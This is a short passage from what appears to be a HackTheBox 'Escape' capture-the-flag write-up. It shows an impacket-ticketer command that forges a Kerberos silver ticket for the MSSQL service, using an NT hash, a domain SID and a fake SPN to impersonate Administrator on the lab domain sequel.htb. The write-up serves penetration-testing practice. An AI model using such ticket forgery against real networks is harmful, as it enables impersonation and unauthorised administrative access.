francescolonardo/writeups/hackthebox_escape.md

 ![Attacker](https://custom-icon-badges.demolab.com/badge/Attacker-e57373?logo=kali-linux_white_32&logoColor=white)

+Now, we can craft a ticket for the MSSQL service.
+The `spn` parameter is needed to produce a valid ticket but we can place anything we want since it's not set to begin with.

 `impacket-ticketer -nthash '1443ec19da4dac4ffc953bca1b57b4cf' -domain-sid 'S-1-5-21-4078382237-1492182817-2568127209' -domain 'sequel.htb' -spn 'fakespn/dc.sequel.htb' 'Administrator'`:
 ```
 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies